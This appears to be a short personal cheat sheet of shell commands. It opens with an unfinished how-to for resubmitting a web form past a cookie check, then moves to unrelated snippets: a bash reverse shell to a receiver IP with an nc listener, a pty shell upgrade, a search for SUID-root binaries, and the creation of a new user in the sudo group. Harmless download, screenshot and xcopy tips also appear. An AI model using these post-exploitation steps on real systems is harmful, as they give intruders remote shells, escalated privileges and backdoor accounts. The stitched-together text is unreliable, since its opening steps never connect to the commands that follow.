So the story goes: you want to “submit” (HTTP POST) the same thing to a web site a bunch of times, and the only control the genius web designer put in your way was a cookie.
Here is how ya do it.
Start up your web browser
Navigate to the URL
Delete ALL cookies
Open a shell (Bash or whatever)
Start tcpdump

python -c 'import pty;pty.spawn("/bin/bash")'
# or
/bin/sh -i

/bin/bash -i >& /dev/tcp/<ip.address.of.receiver>/6666 0>&1
# then at receiver:
nc -l -n -v -p 6666
# And wait for incoming bash shell

find / -user root -perm -4000 -print 2>/dev/null

$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works

useradd -m hal9k2 -G sudo -s /bin/bash
passwd hal9k2
# or manually
sudo adduser hal9k2 sudo

# PowerShell (any version):
(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")
# PowerShell 4.0 & 5.0:
Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip"

# It'll create a screenshot of the selected area and save the file in your home dir.
$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png'
$ ss
# to view
$ display ss-2017-09-13_0350_20.png

bitsadmin /transfer mydownloadjob /download /priority normal http://example.com/filename.zip C:\Users\username\Downloads\filename.zip

# That will copy an entire directory, including subdirectories, to the target.
# The /Y suppresses the overwrite prompt and just does it without asking.
xcopy /S /E /Y <from> <to>